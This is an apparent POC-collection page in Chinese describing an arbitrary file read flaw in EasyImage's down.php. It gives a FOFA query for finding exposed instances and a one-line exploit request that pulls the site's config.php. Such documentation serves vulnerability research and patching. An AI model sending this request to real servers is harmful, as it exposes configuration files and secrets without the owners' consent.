Awesome-POC/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md

31 lines
480 B
Markdown
Raw Normal View History

2023-04-17 10:09:40 +08:00
# EasyImage down.php 任意文件读取漏洞
## 漏洞描述
EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件
## 漏洞影响
```
EasyImage
```
## FOFA
```
app="EasyImage-简单图床"
```
## 漏洞复现
主页面
![image-20230417094057151](images/image-20230417094057151.png)
验证POC
```
/application/down.php?dw=./config/config.php
```
![image-20230417094115549](images/image-20230417094115549.png)